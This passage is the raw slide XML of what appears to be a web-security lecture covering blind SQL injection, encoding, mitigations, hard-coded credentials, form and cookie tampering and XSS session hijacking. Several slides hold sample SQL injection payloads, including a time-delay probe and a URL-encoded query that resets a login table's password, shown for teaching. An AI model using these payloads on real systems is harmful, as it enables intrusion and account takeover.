                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>The attacker can only make inference from the success or failure of the SQL execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>A failure of the execution will usually show a different page or a general error message.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>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37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>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Blind SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Example: using time delay in MS SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>if (select user) = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>waitfor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> delay '0:0:10‘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Are we ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>’? If yes, there will be a delay for 10 seconds</a:t>
            </a:r>
          </a:p>
          <a:p>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38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>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SQL operations</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>SQL injection can also be deployed to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Update records like password or modify data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Insert fake records like login credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Delete records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39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>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Encoding</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ASCII table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Search on the Internet for the ASCII table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>UTF-8 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>One of the most common encoding schemes used on the web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Each character represented by 8 bits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Values in the range 0 to 127 represent each of the ASCII characters</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a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>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Exercise</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Practical 6 Exercise 7</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40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>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ways to mitigate SQL injection vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1412776"/>
            <a:ext cx="8534400" cy="4824536"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Validate or sanitize input from users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use Prepared Statements or Stored Procedures (Note : these are not immune to SQL injections!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Limit database access permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Do not let the web application access to the database with the database admin account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" dirty="0"/>
              <a:t>https://www.owasp.org/index.php/Top_10-2017_A1-Injection</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41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>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Login</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Hard coding of login credentials in web pages is NOT a good practice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="712788" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dbconn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MySQLdb.connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sales", user=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>",</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>secret",database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="sales")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Difficult to maintain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Change of user name or password requires change of code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Different sites/environment (testing, staging, etc) requires different credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Leaking of credentials through viewing of source codes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42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>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Fixing the vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Store encrypted login credential in text file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Use hardware security module (HSM) for decryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Also known as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Cypto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> Box</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Keys are kept within </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>cryptobox</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Limit account privilege</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Only accessible to that database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Disallow access to metadata</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Restrict the clients who can access database server</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43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>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tampering</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>There are a lot of information being carried by HTTP messages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Cookie values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Form data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Query string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>HTTP Headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Undesirable effects may occur when any of these information is tampered</a:t>
            </a:r>
          </a:p>
          <a:p>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44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>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Data</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Form data are passed to the web server through either POST or GET methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Most developers uses client-side validation like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Validation can be bypassed easily through direct manipulation of form data</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45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>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 Data – Hidden Fields</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Hidden fields are used in certain applications to maintain state or preserve information about the transaction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Not really hidden!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB"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46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>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47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 4" descr="Figure-20_4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect r="20291"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-36513" y="179388"/>
            <a:ext cx="9217025" cy="656272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 values</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>A common way to store user information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Essentially a text file stored locally</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Can be tricked to write cookies of another domain (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>. Using XSS)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48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>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Hijacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Exploits the XSS vulnerability in the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Victim logs into the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>XSS page sends session ID to the attacker (web site)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Attacker logs in to the system and replaces his session ID with that of victim</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49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-S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Encoding</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attackers will try to use methods to disguise their attack strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Try browsing to www%2eyahoo%2ecom</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What is the character represented by ASCII code 2E?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Possible URL attack for SQL injection attack:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://target/login.asp?userid=bob%27%3b%20update%20logintable%20set%20passwd%3d%27123%27%3b--%00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Executed SQL query is :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SELECT preferences FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>logintable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=’bob’; update </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>logintable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> set password=’123’;--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>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a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>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Fixing web vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
